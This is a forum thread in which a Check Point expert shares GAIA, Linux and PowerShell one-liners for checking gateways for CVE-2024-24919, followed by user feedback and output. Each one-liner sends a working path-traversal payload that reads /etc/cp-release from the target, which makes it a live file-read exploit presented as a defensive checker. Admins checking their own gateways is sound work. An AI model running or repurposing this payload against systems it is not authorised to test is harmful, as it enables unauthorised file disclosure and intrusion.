Re: ONELINER - Check CVE-2024-24919 Vulnerability

HeikoAnkenbrand · ‎2024-05-31

Run this onliner to check if your Check Point Gateway is vulnerable to CVE-2024-24919 (sk182336).
GAIA gateways and SMB gateways are supported.

1) Depending on where you want to run the Onliner, you can copy and paste the code for GAIA, Linux or Powershell.
Copy the code into the CLI.

1a) GAIA version for expert mode:

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl_cli --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

1b) Linux version (all other linux distributions):

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

1c) Windows Powershell version:

clear;$C="";$O="";[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Add-Type -AssemblyName Microsoft.VisualBasic;$IP_addr = [Microsoft.VisualBasic.Interaction]::InputBox("This is a test tool to check if your Check Point Gateway is vulnerable to CVE-2024-24919.`r`n`r`n`r`nDestination IP:", "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", "");try{$C=(Invoke-WebRequest -Uri "https://${ip_addr}/clients/MyCRL" -Method POST -Body "aCSHELL/../../../../../../../etc/cp-release" -TimeoutSec 5 )} catch [System.Net.WebException] { if([int]$_.Exception.Response.StatusCode -eq 404) {$O="`r`nNo vulnerability could be detected!`r`n" } else {$O="`r`nGateway is not reachable!`r`n"} };  if ($C.StatusCode -match "200") {$O="`r`nNo vulnerability could be detected!`r`n"; if ($C.content -match "Check Point")  {$O="`r`nAttention! `r`nThis system is vulnerable to CVE-2024-24919. More read here sk182336.`r`n"}};Add-Type -AssemblyName System.Windows.Forms; $result = [System.Windows.Forms.MessageBox]::Show($O, "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::None)

2) Now enter the IP address of the gateway to be checked.

GAIA/Linux:

Powershell:

If the following message appears, your system is vulnerable:

Attention!
The system is vulnerable to CVE-2024-24919.
More read here sk182336.

If the following message appears, your system is not vulnerable:

No vulnerability could be detected!

If no output appears, the system is not be reachable.

---

Version:
1.5          06/02/2024                                                     Powershell interactive version with windows
1.4          06/01/2024                                                     Powershell version with correct status codes
1.3          06/01/2024                                                     Linux and Powershell version provided
1.2          05/30/2024                                                     error with SMB applications fixed
1.1          05/29/2024                                                     fixed error with output
1.0          05/28/2024       first version

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips

natascha · ‎2024-05-31

Very helpful tool.
We have checked about 40 gateways and found a few without a hotfix in our company.

Thanks @HeikoAnkenbrand

renzi · ‎2024-05-31

Nice

the_rock · ‎2024-05-31

Fantastic as always!

dceko · ‎2024-06-01

Hi,

Can you modify script to check only for HTTP Response code after "| sed", because i think every gateway that respond with response code that is not 404 - File Not Found is vulnerable? This way this check can be used for small boxes, not managed by management server.

HeikoAnkenbrand · ‎2024-06-01

I have adapted the code so that it should now also work with SMB applications.

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips

HeikoAnkenbrand · ‎2024-06-01

Here you can read the latest information from Check Point:

- Preventative Hotfix for CVE-2024-24919 - Quantum Gateway Information Disclosure

- Important security update - stay protected against VPN Information Disclosure (CVE-2024-24919)

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips

the_rock · ‎2024-06-01

I just ran it on my Azure fw and it did not display anything...weird, though I do have vpn enabled, as well as remote access too. I may need to read up on all this again, as I came back from vacation, so its possible this is not even related to original issue with local vpn users/remote access. Never mind, read it afterwards, it is related, but will look into it more Monday.

Andy

CVE-2024-24919 check tool by Heiko Ankenbrand 2024

Destination IP: 52.229.98.249
[Expert@azurefw:0]#

Moudar · ‎2024-06-01

When running it on my gateway expert mode i get this:

Destination IP: 10.10.11.11
<!DOCTYPE html><HTML><HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9,EmulateIE8"><meta name="others" content="WEBUI LOGIN PAGE"  /><TITLE>GAiA</TITLE>
<link rel="shortcut icon" href="/login/fav.ico">
<link rel="stylesheet" type="text/css" href="/login/ext-all.css" />
<link rel="stylesheet" type="text/css" href="/login/login.css" />
<STYLE TYPE="text/css">
.ext-ie .webui-login-fld{font-size: 11px;}
</STYLE>
<script type="text/javascript" src="/login/ext-base.js"></script><script type="text/javascript" src="/login/ext-all.js"></script><script type="text/javascript">var errMsgText = "";var bannerMsgText = "";bannerMsgText += "This%20system%20is%20for%20authorized%20use%20only.%0A";var hostname='fw01';var version='R81.20';var formAction="/cgi-bin/home.tcl";</script><script type="text/javascript" src="/login/login.js"></script></HEAD><BODY><noscript><div style='font-size:20px;position:relative;top:100px;'>For full functionality of this site it is necessary to enable JavaScript.</div></noscript></BODY></HTML>

the_rock · ‎2024-06-01

R81.20?

HeikoAnkenbrand · ‎2024-06-01

Hi @Moudar

This is the HTML code of the gateway login screen.
I have modified the onliner so that this will no longer be shown in the future.

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips

genisis__ · ‎2024-06-02

Is there a oneliner we can run on the gateway itself and how does this work in VSX?

HeikoAnkenbrand · ‎2024-06-02

I think that should work in VS0.

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips

genisis__ · ‎2024-06-02

thanks Heiko

HeikoAnkenbrand · ‎2024-06-02

Version 1.5 works as an interactive version with windows:

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips

the_rock · ‎2024-06-04

AWESOME!

EitschStwoN · ‎2024-06-03

Hi Heiko,

Thanks for this script, it is really a shame that Checkpoint did not provide this themselves or at least refer to this article in the mitigation guide.

Looks like the problem has been around for a long time and its strange that this has never been seen in a CODE review.
Usually you trust a firewall not to have such rookie bugs.

Markus

GHOST · ‎2024-06-04

👍

HeikoAnkenbrand · ‎2024-06-10

@EitschStwoN

I think they don't want to publish the exploit code in the forum.
And from my point of view, that's a good thing.

➜ CCSM Elite, CCME, CCTE ➜ www.checkpoint.tips

the_rock · ‎2024-06-10

Totally agree.

Are you a member of CheckMates?

ONELINER - Check CVE-2024-24919 Vulnerability